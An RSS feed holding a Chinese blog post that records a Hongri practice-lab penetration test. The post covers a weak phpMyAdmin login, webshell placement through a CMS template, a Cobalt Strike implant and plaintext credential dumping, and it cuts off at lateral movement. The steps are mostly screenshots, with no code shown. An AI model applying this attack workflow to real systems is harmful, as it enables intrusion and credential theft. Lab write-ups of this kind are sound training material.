<?xml version="1.0" encoding="utf-8"?>
<rss version="2.0" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:content="http://purl.org/rss/1.0/modules/content/">
    <channel>
        <title>yuki’s Blog</title>
        <link>https://yuki8888.top/</link>
        <description>山脚人多,我们山顶见</description>
        <lastBuildDate>Thu, 13 Jun 2024 20:16:43 GMT</lastBuildDate>
        <docs>https://validator.w3.org/feed/docs/rss2.html</docs>
        <generator>https://github.com/jpmonette/feed</generator>
        <language>zh-CN</language>
        <copyright>All rights reserved 2024, Yuki</copyright>
        <item>
            <title><![CDATA[记录第二次打红日靶场一]]></title>
            <link>https://yuki8888.top/article/f14a58c3-2df7-4cc5-b1dc-3f5e2922452f</link>
            <guid>https://yuki8888.top/article/f14a58c3-2df7-4cc5-b1dc-3f5e2922452f</guid>
            <pubDate>Tue, 05 Dec 2023 00:00:00 GMT</pubDate>
            <content:encoded><![CDATA[<div id="notion-article" class="mx-auto overflow-hidden "><main class="notion light-mode notion-page notion-block-f14a58c32df74cc5b1dc3f5e2922452f"><div class="notion-viewport"></div><div class="notion-collection-page-properties"></div><div class="notion-callout notion-gray_background_co notion-block-fb513c5558c942deb51e16314374c84f"><div class="notion-page-icon-inline notion-page-icon-span"><span class="notion-page-icon" role="img" aria-label="😀">😀</span></div><div class="notion-callout-text">上一次记录主要使用msf马，没有打穿内网，于是重新上网找资料复现一下CS马的全流程，这次的环境和攻击流程都感觉流畅了很多，即便是第二次打红日，感觉还是收获满满</div></div><div class="notion-blank notion-block-29e12b4e8c354640ade4664d36e9db6b"> </div><h2 class="notion-h notion-h1 notion-h-indent-0 notion-block-ba62a7b769f24a0682af1344ac1b49fa" data-id="ba62a7b769f24a0682af1344ac1b49fa"><span><div id="ba62a7b769f24a0682af1344ac1b49fa" class="notion-header-anchor"></div><a class="notion-hash-link" href="#ba62a7b769f24a0682af1344ac1b49fa" title="📝 主旨内容"><svg viewBox="0 0 16 16" width="16" height="16"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg></a><span class="notion-h-title">📝 主旨内容</span></span></h2><div class="notion-text notion-block-e8865e6ba4cb427293756703d3d6ad50">靶场统一密码：hongrisec@2019</div><div class="notion-text notion-block-1be79ed4dd964d0e987392188bca5584">winserver2008和win2k3第一次登录需要修改密码（貌似会影响到后续的psexec横向，我这里没有修改密码，ping通后就不管了）</div><h4 class="notion-h notion-h3 notion-h-indent-1 notion-block-18e14add6e874c118b0e562bfa8d4cee" data-id="18e14add6e874c118b0e562bfa8d4cee"><span><div id="18e14add6e874c118b0e562bfa8d4cee" class="notion-header-anchor"></div><a class="notion-hash-link" href="#18e14add6e874c118b0e562bfa8d4cee" title="拓扑图"><svg viewBox="0 0 16 16" width="16" height="16"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg></a><span class="notion-h-title">拓扑图</span></span></h4><div class="notion-text notion-block-3c7ab39af8e84c63b59907544a5dee71"></div><div class="notion-text notion-block-671b878a12b148378f1868463741ecdc"></div><figure class="notion-asset-wrapper notion-asset-wrapper-image notion-block-38d529d3d9d04a098d0bae9e1671b925"><div style="position:relative;display:flex;justify-content:center;align-self:center;width:100%;max-width:100%;flex-direction:column;height:100%"><img style="object-fit:cover" src="https://www.notion.so/image/https%3A%2F%2Fprod-files-secure.s3.us-west-2.amazonaws.com%2F27e0ef76-643c-4c73-8160-d75849541dbf%2F7dee4093-12d5-47e5-821f-043a96ae7fc8%2FUntitled.png?table=block&amp;id=38d529d3-d9d0-4a09-8d0b-ae9e1671b925&amp;t=38d529d3-d9d0-4a09-8d0b-ae9e1671b925&amp;width=1022&amp;cache=v2" alt="notion image" loading="lazy" decoding="async"/></div></figure><h4 class="notion-h notion-h3 notion-h-indent-1 notion-block-d07d72f35132486db01e5f1c75d1872b" data-id="d07d72f35132486db01e5f1c75d1872b"><span><div id="d07d72f35132486db01e5f1c75d1872b" class="notion-header-anchor"></div><a class="notion-hash-link" href="#d07d72f35132486db01e5f1c75d1872b" title="攻击机可达"><svg viewBox="0 0 16 16" width="16" height="16"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg></a><span class="notion-h-title">攻击机可达</span></span></h4><div class="notion-text notion-block-34efc8040ebe4b9d8f5f013b2be3b7c7">win7双网卡	对外ip（vmnet8）：192.168.235.131	(攻击机可访问)</div><div class="notion-text notion-block-dcfd95e3ce574752bb283c455a49d80c">对内ip（vmnet9）：192.168.52.129	（只能内网访问，即win2k3、win2008可访问）</div><h4 class="notion-h notion-h3 notion-h-indent-1 notion-block-5eb3c6a5521f4b00803548702e886ae5" data-id="5eb3c6a5521f4b00803548702e886ae5"><span><div id="5eb3c6a5521f4b00803548702e886ae5" class="notion-header-anchor"></div><a class="notion-hash-link" href="#5eb3c6a5521f4b00803548702e886ae5" title="攻击机不可达"><svg viewBox="0 0 16 16" width="16" height="16"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg></a><span class="notion-h-title">攻击机不可达</span></span></h4><div class="notion-text notion-block-a438bd7c26aa4947967b364eeee668fe">win2k3		内网ip（vmnet9）：192.168.52.141</div><div class="notion-text notion-block-9c0d62f933414d3bbb556f37dcf954f4">win2008		内网ip（vmnet9）：192.168.52.138</div><div class="notion-text notion-block-3c96ebdfc87e4fe689fe5a713f8747bf">攻击机*（kali）对外ip（vmnet8）：192.168.235.137</div><h4 class="notion-h notion-h3 notion-h-indent-1 notion-block-0b9e7c29d46b40daa7ddd84358467566" data-id="0b9e7c29d46b40daa7ddd84358467566"><span><div id="0b9e7c29d46b40daa7ddd84358467566" class="notion-header-anchor"></div><a class="notion-hash-link" href="#0b9e7c29d46b40daa7ddd84358467566" title="php探针：/"><svg viewBox="0 0 16 16" width="16" height="16"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg></a><span class="notion-h-title">php探针：/</span></span></h4><div class="notion-text notion-block-d8ec3e15252e4e508bc81148343af089"></div><figure class="notion-asset-wrapper notion-asset-wrapper-image notion-block-9f467aa1d6be4f419dc6997203b90378"><div style="position:relative;display:flex;justify-content:center;align-self:center;width:100%;max-width:100%;flex-direction:column;height:100%"><img style="object-fit:cover" src="https://www.notion.so/image/https%3A%2F%2Fprod-files-secure.s3.us-west-2.amazonaws.com%2F27e0ef76-643c-4c73-8160-d75849541dbf%2Fcf315260-dc76-49a1-9626-754266ce7a0a%2FUntitled.png?table=block&amp;id=9f467aa1-d6be-4f41-9dc6-997203b90378&amp;t=9f467aa1-d6be-4f41-9dc6-997203b90378&amp;width=784&amp;cache=v2" alt="notion image" loading="lazy" decoding="async"/></div></figure><div class="notion-text notion-block-f66c052a457c4ba48dfaa53b322b38d2"></div><h4 class="notion-h notion-h3 notion-h-indent-1 notion-block-6078edd67ba447929cbf450879974da6" data-id="6078edd67ba447929cbf450879974da6"><span><div id="6078edd67ba447929cbf450879974da6" class="notion-header-anchor"></div><a class="notion-hash-link" href="#6078edd67ba447929cbf450879974da6" title="phpinfo:/phpinfo.php"><svg viewBox="0 0 16 16" width="16" height="16"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg></a><span class="notion-h-title">phpinfo:/phpinfo.php</span></span></h4><div class="notion-text notion-block-1cdfc6b68c3a4a1abcb7ab2e26accf9b"></div><div class="notion-text notion-block-b4d8790411ce4f2a962be0d03f2c8290"></div><figure class="notion-asset-wrapper notion-asset-wrapper-image notion-block-4392045d87b7410e8ccd76e5710b6653"><div style="position:relative;display:flex;justify-content:center;align-self:center;width:100%;max-width:100%;flex-direction:column;height:100%"><img style="object-fit:cover" src="https://www.notion.so/image/https%3A%2F%2Fprod-files-secure.s3.us-west-2.amazonaws.com%2F27e0ef76-643c-4c73-8160-d75849541dbf%2F8c9423c0-7a52-4ba7-97a7-566ceea22514%2FUntitled.png?table=block&amp;id=4392045d-87b7-410e-8ccd-76e5710b6653&amp;t=4392045d-87b7-410e-8ccd-76e5710b6653&amp;width=825&amp;cache=v2" alt="notion image" loading="lazy" decoding="async"/></div></figure><h4 class="notion-h notion-h3 notion-h-indent-1 notion-block-f0018087fb2346c8953c587ffdde54d5" data-id="f0018087fb2346c8953c587ffdde54d5"><span><div id="f0018087fb2346c8953c587ffdde54d5" class="notion-header-anchor"></div><a class="notion-hash-link" href="#f0018087fb2346c8953c587ffdde54d5" title="phpmyadmin:/phpmyadmin"><svg viewBox="0 0 16 16" width="16" height="16"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg></a><span class="notion-h-title">phpmyadmin:/phpmyadmin</span></span></h4><h4 class="notion-h notion-h3 notion-h-indent-1 notion-block-023bdc105f7d44bda2b075b204f9f2a7" data-id="023bdc105f7d44bda2b075b204f9f2a7"><span><div id="023bdc105f7d44bda2b075b204f9f2a7" class="notion-header-anchor"></div><a class="notion-hash-link" href="#023bdc105f7d44bda2b075b204f9f2a7" title="phpmyadmin弱口令"><svg viewBox="0 0 16 16" width="16" height="16"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg></a><span class="notion-h-title">phpmyadmin弱口令</span></span></h4><div class="notion-text notion-block-79903da927694d93a2af1a9c67a8bc18">root	root</div><div class="notion-text notion-block-958f29684a114014be8b270b93f07156"></div><div class="notion-text notion-block-3ee010ab2a0a4375a834e9b12288cd3e"></div><figure class="notion-asset-wrapper notion-asset-wrapper-image notion-block-f5216d629e5c4ed182478b6e7698f9d9"><div style="position:relative;display:flex;justify-content:center;align-self:center;width:100%;max-width:100%;flex-direction:column;height:100%"><img style="object-fit:cover" src="https://www.notion.so/image/https%3A%2F%2Fprod-files-secure.s3.us-west-2.amazonaws.com%2F27e0ef76-643c-4c73-8160-d75849541dbf%2F1b97335a-1eb3-402a-8323-086d28a173a2%2FUntitled.png?table=block&amp;id=f5216d62-9e5c-4ed1-8247-8b6e7698f9d9&amp;t=f5216d62-9e5c-4ed1-8247-8b6e7698f9d9&amp;width=1860&amp;cache=v2" alt="notion image" loading="lazy" decoding="async"/></div></figure><div class="notion-text notion-block-70a41cf8bd6e453aba7af2a5370bceea"></div><figure class="notion-asset-wrapper notion-asset-wrapper-image notion-block-6e0dc109aabc46e0a1fcf781d467ae69"><div style="position:relative;display:flex;justify-content:center;align-self:center;width:524px;max-width:100%;flex-direction:column"><img style="object-fit:cover" src="https://www.notion.so/image/https%3A%2F%2Fprod-files-secure.s3.us-west-2.amazonaws.com%2F27e0ef76-643c-4c73-8160-d75849541dbf%2F17ec56e0-9d0a-4440-8492-316eed3f6dc4%2FUntitled.png?table=block&amp;id=6e0dc109-aabc-46e0-a1fc-f781d467ae69&amp;t=6e0dc109-aabc-46e0-a1fc-f781d467ae69&amp;width=524&amp;cache=v2" alt="notion image" loading="lazy" decoding="async"/></div></figure><div class="notion-text notion-block-7508bdf72dbb46099c75d9f18ac64bab"></div><div class="notion-text notion-block-0d0b6098d9024d7db52a355b583502d6"></div><figure class="notion-asset-wrapper notion-asset-wrapper-image notion-block-6fa9256c1818420ab19ab89692763752"><div style="position:relative;display:flex;justify-content:center;align-self:center;width:628px;max-width:100%;flex-direction:column"><img style="object-fit:cover" src="https://www.notion.so/image/https%3A%2F%2Fprod-files-secure.s3.us-west-2.amazonaws.com%2F27e0ef76-643c-4c73-8160-d75849541dbf%2F5072d819-1bdd-440c-b6be-efca0d745213%2FUntitled.png?table=block&amp;id=6fa9256c-1818-420a-b19a-b89692763752&amp;t=6fa9256c-1818-420a-b19a-b89692763752&amp;width=628&amp;cache=v2" alt="notion image" loading="lazy" decoding="async"/></div></figure><div class="notion-text notion-block-34c6b039ad284b67bc0f291ba912b31f"></div><div class="notion-text notion-block-6d9ae4792f784520a13d62fc254a6484">访问/test.php</div><div class="notion-text notion-block-8b76102769104c5f836f0c3762547250"></div><div class="notion-text notion-block-2fbee27cc41140bfa26a9829caaead9d"></div><figure class="notion-asset-wrapper notion-asset-wrapper-image notion-block-baf2a2e441284ecb8087003ac2cec76c"><div style="position:relative;display:flex;justify-content:center;align-self:center;width:100%;max-width:100%;flex-direction:column;height:100%"><img style="object-fit:cover" src="https://www.notion.so/image/https%3A%2F%2Fprod-files-secure.s3.us-west-2.amazonaws.com%2F27e0ef76-643c-4c73-8160-d75849541dbf%2F8e522f53-8244-4193-956c-61200bb0eb13%2FUntitled.png?table=block&amp;id=baf2a2e4-4128-4ecb-8087-003ac2cec76c&amp;t=baf2a2e4-4128-4ecb-8087-003ac2cec76c&amp;width=1341&amp;cache=v2" alt="notion image" loading="lazy" decoding="async"/></div></figure><div class="notion-text notion-block-15908f2e75e845ff929a949ba24d26d2">这里其实是已经写进去了，一句话木马执行</div><div class="notion-text notion-block-ab12dfa8d2c9460ab091961781689558">蚁剑连接一句话木马（vmtools安装后记得重启一下，不然测试连接的时候会弹窗然后连不上。。。）</div><div class="notion-text notion-block-478599d1f5c449e1bc69262e4dc9be54"></div><div class="notion-text notion-block-2e1e36f37c5c48af8518c099a5216bfa"></div><figure class="notion-asset-wrapper notion-asset-wrapper-image notion-block-b7b419bcb6074f109e90159d4cdb752b"><div style="position:relative;display:flex;justify-content:center;align-self:center;width:100%;max-width:100%;flex-direction:column;height:100%"><img style="object-fit:cover" src="https://www.notion.so/image/https%3A%2F%2Fprod-files-secure.s3.us-west-2.amazonaws.com%2F27e0ef76-643c-4c73-8160-d75849541dbf%2Fb7568e26-0fe8-4761-bbdc-30680ad0fd72%2FUntitled.png?table=block&amp;id=b7b419bc-b607-4f10-9e90-159d4cdb752b&amp;t=b7b419bc-b607-4f10-9e90-159d4cdb752b&amp;width=602.5757446289062&amp;cache=v2" alt="notion image" loading="lazy" decoding="async"/></div></figure><h4 class="notion-h notion-h3 notion-h-indent-1 notion-block-4d97cdccb8a94de0a9f8737c76a81aaf" data-id="4d97cdccb8a94de0a9f8737c76a81aaf"><span><div id="4d97cdccb8a94de0a9f8737c76a81aaf" class="notion-header-anchor"></div><a class="notion-hash-link" href="#4d97cdccb8a94de0a9f8737c76a81aaf" title="cms：/yxcms"><svg viewBox="0 0 16 16" width="16" height="16"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg></a><span class="notion-h-title">cms：/yxcms</span></span></h4><div class="notion-text notion-block-da61267b58614f59a2c5d0ddf03f255c"></div><figure class="notion-asset-wrapper notion-asset-wrapper-image notion-block-635862d3d41543eab2e529e1018d9554"><div style="position:relative;display:flex;justify-content:center;align-self:center;width:100%;max-width:100%;flex-direction:column;height:100%"><img style="object-fit:cover" src="https://www.notion.so/image/https%3A%2F%2Fprod-files-secure.s3.us-west-2.amazonaws.com%2F27e0ef76-643c-4c73-8160-d75849541dbf%2Fb3f49aec-d795-426a-bbfd-7a2a9e64f6f5%2FUntitled.png?table=block&amp;id=635862d3-d415-43ea-b2e5-29e1018d9554&amp;t=635862d3-d415-43ea-b2e5-29e1018d9554&amp;width=1888&amp;cache=v2" alt="notion image" loading="lazy" decoding="async"/></div></figure><div class="notion-text notion-block-f899e136e758464280f2f71c27f5934b"></div><div class="notion-text notion-block-4f26af26d5e244fe8e2179c8406c54e6"></div><figure class="notion-asset-wrapper notion-asset-wrapper-image notion-block-ea5c09091b0d4b30ab4c23e1293346d4"><div style="position:relative;display:flex;justify-content:center;align-self:center;width:100%;max-width:100%;flex-direction:column;height:100%"><img style="object-fit:cover" src="https://www.notion.so/image/https%3A%2F%2Fprod-files-secure.s3.us-west-2.amazonaws.com%2F27e0ef76-643c-4c73-8160-d75849541dbf%2Ff5c93338-d261-4ead-bc4b-b556ccb8bc66%2FUntitled.png?table=block&amp;id=ea5c0909-1b0d-4b30-ab4c-23e1293346d4&amp;t=ea5c0909-1b0d-4b30-ab4c-23e1293346d4&amp;width=2349&amp;cache=v2" alt="notion image" loading="lazy" decoding="async"/></div></figure><div class="notion-text notion-block-e869e663962d48d382f20b0f9c259dbb">这里可以看到前端的模板文件</div><figure class="notion-asset-wrapper notion-asset-wrapper-image notion-block-242f69f6449e4fc4b70f3320ede6d693"><div style="position:relative;display:flex;justify-content:center;align-self:center;width:100%;max-width:100%;flex-direction:column;height:100%"><img style="object-fit:cover" src="https://www.notion.so/image/https%3A%2F%2Fprod-files-secure.s3.us-west-2.amazonaws.com%2F27e0ef76-643c-4c73-8160-d75849541dbf%2F6b85fce4-10a1-44a9-881b-dc10433c7de6%2FUntitled.png?table=block&amp;id=242f69f6-449e-4fc4-b70f-3320ede6d693&amp;t=242f69f6-449e-4fc4-b70f-3320ede6d693&amp;width=2348&amp;cache=v2" alt="notion image" loading="lazy" decoding="async"/></div></figure><div class="notion-text notion-block-6defa6d08a3a406eb83bf687d8fd61a2">试试编辑模板</div><figure class="notion-asset-wrapper notion-asset-wrapper-image notion-block-0c6b488347564fd38cd978bc835e09ef"><div style="position:relative;display:flex;justify-content:center;align-self:center;width:100%;max-width:100%;flex-direction:column;height:100%"><img style="object-fit:cover" src="https://www.notion.so/image/https%3A%2F%2Fprod-files-secure.s3.us-west-2.amazonaws.com%2F27e0ef76-643c-4c73-8160-d75849541dbf%2Fa6f692fe-de37-4f49-8239-f28c588643c5%2FUntitled.png?table=block&amp;id=0c6b4883-4756-4fd3-8cd9-78bc835e09ef&amp;t=0c6b4883-4756-4fd3-8cd9-78bc835e09ef&amp;width=2416&amp;cache=v2" alt="notion image" loading="lazy" decoding="async"/></div></figure><div class="notion-text notion-block-60de64382c6445059a80d3ac27bbc0e0">尝试修改一下文件，然后去主页刷新查找</div><figure class="notion-asset-wrapper notion-asset-wrapper-image notion-block-15bffb1568a6444584d75a3a33d0fd54"><div style="position:relative;display:flex;justify-content:center;align-self:center;width:100%;max-width:100%;flex-direction:column;height:100%"><img style="object-fit:cover" src="https://www.notion.so/image/https%3A%2F%2Fprod-files-secure.s3.us-west-2.amazonaws.com%2F27e0ef76-643c-4c73-8160-d75849541dbf%2Faf6ba492-a58b-4498-bf1d-90553992c1d2%2FUntitled.png?table=block&amp;id=15bffb15-68a6-4445-84d7-5a3a33d0fd54&amp;t=15bffb15-68a6-4445-84d7-5a3a33d0fd54&amp;width=1995&amp;cache=v2" alt="notion image" loading="lazy" decoding="async"/></div></figure><div class="notion-text notion-block-1c5266ebdc3a44ae82949e218a8d4bbe">说明这里对应这模板文件，可以在这里写一句话木马</div><figure class="notion-asset-wrapper notion-asset-wrapper-image notion-block-ab80f8ed6b064fa0a42c1b32b6130b80"><div style="position:relative;display:flex;justify-content:center;align-self:center;width:100%;max-width:100%;flex-direction:column;height:100%"><img style="object-fit:cover" src="https://www.notion.so/image/https%3A%2F%2Fprod-files-secure.s3.us-west-2.amazonaws.com%2F27e0ef76-643c-4c73-8160-d75849541dbf%2F3bc1863e-e05b-408f-8968-93fc2d3c75ed%2FUntitled.png?table=block&amp;id=ab80f8ed-6b06-4fa0-a42c-1b32b6130b80&amp;t=ab80f8ed-6b06-4fa0-a42c-1b32b6130b80&amp;width=2087&amp;cache=v2" alt="notion image" loading="lazy" decoding="async"/></div></figure><h4 class="notion-h notion-h3 notion-h-indent-1 notion-block-9984cc3950924407915aad8b81499df4" data-id="9984cc3950924407915aad8b81499df4"><span><div id="9984cc3950924407915aad8b81499df4" class="notion-header-anchor"></div><a class="notion-hash-link" href="#9984cc3950924407915aad8b81499df4" title="连接蚁剑"><svg viewBox="0 0 16 16" width="16" height="16"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg></a><span class="notion-h-title">连接蚁剑</span></span></h4><div class="notion-text notion-block-08665e9ad6c1459f83cf357dbd32b557"></div><figure class="notion-asset-wrapper notion-asset-wrapper-image notion-block-0d6a3d63eab645e0bd31397e8223ba3f"><div style="position:relative;display:flex;justify-content:center;align-self:center;width:100%;max-width:100%;flex-direction:column;height:100%"><img style="object-fit:cover" src="https://www.notion.so/image/https%3A%2F%2Fprod-files-secure.s3.us-west-2.amazonaws.com%2F27e0ef76-643c-4c73-8160-d75849541dbf%2F3ffc1213-a5d8-4268-a8f2-6f25d0833db4%2FUntitled.png?table=block&amp;id=0d6a3d63-eab6-45e0-bd31-397e8223ba3f&amp;t=0d6a3d63-eab6-45e0-bd31-397e8223ba3f&amp;width=1278&amp;cache=v2" alt="notion image" loading="lazy" decoding="async"/></div></figure><div class="notion-text notion-block-3d33fddf24884c3c8f8f27956b65c335"></div><div class="notion-text notion-block-12c53e6872b84870ab7f238c3f8049a1">上传并且执行cs马/msf马</div><h4 class="notion-h notion-h3 notion-h-indent-1 notion-block-b718616507f34419a497a6a0431a0fba" data-id="b718616507f34419a497a6a0431a0fba"><span><div id="b718616507f34419a497a6a0431a0fba" class="notion-header-anchor"></div><a class="notion-hash-link" href="#b718616507f34419a497a6a0431a0fba" title="CS马"><svg viewBox="0 0 16 16" width="16" height="16"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg></a><span class="notion-h-title">CS马</span></span></h4><div class="notion-text notion-block-0d295e241a3f448e9655ab284d7ecbd4"></div><div class="notion-text notion-block-bcff82eef2dc4db883e0f1d99dfd1edd">添加监听器并生成对应payload</div><figure class="notion-asset-wrapper notion-asset-wrapper-image notion-block-8da53f7cc37d4599af97ac283478c24c"><div style="position:relative;display:flex;justify-content:center;align-self:center;width:451px;max-width:100%;flex-direction:column"><img style="object-fit:cover" src="https://www.notion.so/image/https%3A%2F%2Fprod-files-secure.s3.us-west-2.amazonaws.com%2F27e0ef76-643c-4c73-8160-d75849541dbf%2Fdfde51ca-871f-4dce-a147-1ce9e6debb76%2FUntitled.png?table=block&amp;id=8da53f7c-c37d-4599-af97-ac283478c24c&amp;t=8da53f7c-c37d-4599-af97-ac283478c24c&amp;width=451&amp;cache=v2" alt="notion image" loading="lazy" decoding="async"/></div></figure><div class="notion-text notion-block-8c9582fb18bc423995cd227ffef73a7a"></div><div class="notion-text notion-block-7ca3bb318bd64ae492c748b8804e98ed">通过蚁剑上传cs马上线</div><figure class="notion-asset-wrapper notion-asset-wrapper-image notion-block-eb8405cb4b8f4ce9b311d653fdab2762"><div style="position:relative;display:flex;justify-content:center;align-self:center;width:100%;max-width:100%;flex-direction:column;height:100%"><img style="object-fit:cover" src="https://www.notion.so/image/https%3A%2F%2Fprod-files-secure.s3.us-west-2.amazonaws.com%2F27e0ef76-643c-4c73-8160-d75849541dbf%2F5b942f95-3ef0-400e-b28d-346f240e7e2d%2FUntitled.png?table=block&amp;id=eb8405cb-4b8f-4ce9-b311-d653fdab2762&amp;t=eb8405cb-4b8f-4ce9-b311-d653fdab2762&amp;width=1470&amp;cache=v2" alt="notion image" loading="lazy" decoding="async"/></div></figure><div class="notion-text notion-block-f6317062439141ffaf737e7247e51836"></div><div class="notion-text notion-block-f264173240ec43a0976199b126fd61ad">抓取明文密码（为横向做准备）</div><figure class="notion-asset-wrapper notion-asset-wrapper-image notion-block-eadb494a215449c9a6e83e091fdc41b4"><div style="position:relative;display:flex;justify-content:center;align-self:center;width:100%;max-width:100%;flex-direction:column;height:100%"><img style="object-fit:cover" src="https://www.notion.so/image/https%3A%2F%2Fprod-files-secure.s3.us-west-2.amazonaws.com%2F27e0ef76-643c-4c73-8160-d75849541dbf%2Fe25a4b15-83e7-4b99-bba3-7994b2c978f2%2FUntitled.png?table=block&amp;id=eadb494a-2154-49c9-a6e8-3e091fdc41b4&amp;t=eadb494a-2154-49c9-a6e8-3e091fdc41b4&amp;width=795&amp;cache=v2" alt="notion image" loading="lazy" decoding="async"/></div></figure><h4 class="notion-h notion-h3 notion-h-indent-1 notion-block-14cf9924c5d04db5b9420ee961e9e44a" data-id="14cf9924c5d04db5b9420ee961e9e44a"><span><div id="14cf9924c5d04db5b9420ee961e9e44a" class="notion-header-anchor"></div><a class="notion-hash-link" href="#14cf9924c5d04db5b9420ee961e9e44a" title="横向渗透"><svg viewBox="0 0 16 16" width="16" height="16"><path fill-rule="evenodd" d="M7.775 